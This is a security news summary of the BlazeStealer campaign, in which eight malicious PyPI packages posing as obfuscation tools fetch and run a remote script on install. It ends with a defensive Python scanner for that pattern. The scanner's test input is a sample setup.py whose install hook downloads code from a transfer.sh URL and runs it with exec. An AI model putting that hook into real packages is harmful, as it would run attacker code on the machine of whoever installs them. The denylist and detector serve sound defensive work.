November 8, 2023 at 08:27AM
A set of malicious Python packages, disguised as obfuscation tools, has been discovered on the Python Package Index (PyPI) repository. The packages contain malware called BlazeStealer, which allows attackers to gain control over compromised systems. The campaign began in January 2023 and includes eight packages. The malware can steal sensitive information, execute commands, encrypt files, and even render the computer unusable. Developers are urged to be cautious and carefully vet packages before use.
Key Takeaways:
– Malicious Python packages have been discovered on the Python Package Index (PyPI) repository.
– The packages masquerade as obfuscation tools but contain malware called BlazeStealer.
– BlazeStealer retrieves a malicious script from an external source, enabling attackers to gain complete control over a victim’s computer.
– The campaign started in January 2023 and includes eight packages named Pyobftoexe, Pyobfusfile, Pyobfexecute, Pyobfpremium, Pyobflite, Pyobfadvance, Pyobfuse, and pyobfgood.
– These packages retrieve a Python script hosted on transfer[.]sh and execute it upon installation.
– BlazeStealer allows threat actors to harvest sensitive information, execute commands, encrypt files, and deactivate Microsoft Defender Antivirus.
– It can also render a computer unusable by increasing CPU usage, shutting down the machine, or causing a blue screen of death (BSoD) error.
– Downloads of the rogue packages were mostly from the U.S., followed by China, Russia, Ireland, Hong Kong, Croatia, France, and Spain.
– Developers are advised to remain vigilant and vet packages before consumption in the open-source domain.
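The behaviour described above (a setup-time hook that fetches a script from a remote host and runs it with exec) is something a developer can check for before installing a package. The following is an added example written for this summary, not code from the researchers or from the malicious packages: it compares a requirements list against the eight package names reported in the campaign, and statically inspects a setup.py with Python's ast module for the combination of an install hook, a network-client import and an exec/eval call. The two setup.py sources embedded below are constructed for the example, and the transfer.sh URL in the suspicious one is a placeholder.

```python
import ast
import re

# Package names reported in the campaign (from the summary above), normalised to lowercase.
BLAZESTEALER_PACKAGES = {
    "pyobftoexe", "pyobfusfile", "pyobfexecute", "pyobfpremium",
    "pyobflite", "pyobfadvance", "pyobfuse", "pyobfgood",
}

# Top-level modules that give setup-time code a way to reach the network.
NETWORK_ROOTS = {"urllib", "requests", "http", "socket", "httpx"}

# Setuptools command classes that run arbitrary code during installation.
INSTALL_COMMANDS = {"install", "develop", "egg_info"}

_REQ_NAME = re.compile(r"^\s*([A-Za-z0-9][A-Za-z0-9._-]*)")


def check_requirements(lines):
    """Return the requirement names (lowercased) that match a reported malicious package."""
    flagged = []
    for line in lines:
        match = _REQ_NAME.match(line)
        if match and match.group(1).lower() in BLAZESTEALER_PACKAGES:
            flagged.append(match.group(1).lower())
    return flagged


def _called_name(call):
    """Name of the function being called: exec(...) -> 'exec', urllib.request.urlopen(...) -> 'urlopen'."""
    func = call.func
    if isinstance(func, ast.Name):
        return func.id
    if isinstance(func, ast.Attribute):
        return func.attr
    return None


def scan_setup_source(source):
    """Statically inspect a setup.py for install hooks, network imports and exec/eval calls."""
    tree = ast.parse(source)
    findings = {"network_imports": [], "exec_calls": [], "install_hook": False}
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for alias in node.names:
                if alias.name.split(".")[0] in NETWORK_ROOTS:
                    findings["network_imports"].append(alias.name)
        elif isinstance(node, ast.ImportFrom):
            if node.module and node.module.split(".")[0] in NETWORK_ROOTS:
                findings["network_imports"].append(node.module)
        elif isinstance(node, ast.ClassDef):
            # A class deriving from setuptools' install/develop/egg_info runs at install time.
            for base in node.bases:
                base_name = base.id if isinstance(base, ast.Name) else getattr(base, "attr", None)
                if base_name in INSTALL_COMMANDS:
                    findings["install_hook"] = True
        elif isinstance(node, ast.Call):
            name = _called_name(node)
            if name in {"exec", "eval"}:
                findings["exec_calls"].append(node.lineno)
            # setup(..., cmdclass={...}) wires a custom command class into the install.
            if name == "setup" and any(kw.arg == "cmdclass" for kw in node.keywords):
                findings["install_hook"] = True
    return findings


def verdict(findings):
    """'suspicious' when code can run at install time and reach out or exec, else 'clean'."""
    net = bool(findings["network_imports"])
    execs = bool(findings["exec_calls"])
    hook = findings["install_hook"]
    if (hook and (execs or net)) or (execs and net):
        return "suspicious"
    return "clean"


# Constructed sample mirroring the pattern described in the summary (placeholder URL).
SUSPICIOUS_SETUP_PY = '''
from setuptools import setup
from setuptools.command.install import install
import urllib.request

class PostInstall(install):
    def run(self):
        install.run(self)
        exec(urllib.request.urlopen("https://transfer.sh/PLACEHOLDER/stage2.py").read())

setup(name="pyobfgood", version="1.0", cmdclass={"install": PostInstall})
'''

# Constructed benign setup.py for contrast.
BENIGN_SETUP_PY = 'from setuptools import setup\nsetup(name="demo", version="0.1")\n'

if __name__ == "__main__":
    print(check_requirements(["requests>=2.0", "Pyobfgood==1.0", "pyobflite"]))
    print(verdict(scan_setup_source(SUSPICIOUS_SETUP_PY)))
    print(verdict(scan_setup_source(BENIGN_SETUP_PY)))
```

Static inspection of this kind only catches the plain form of the pattern; a package can hide the same behaviour behind string building, base64 or a second-stage download, so the check is a triage aid to run alongside a name denylist and a review of what the package actually does on install.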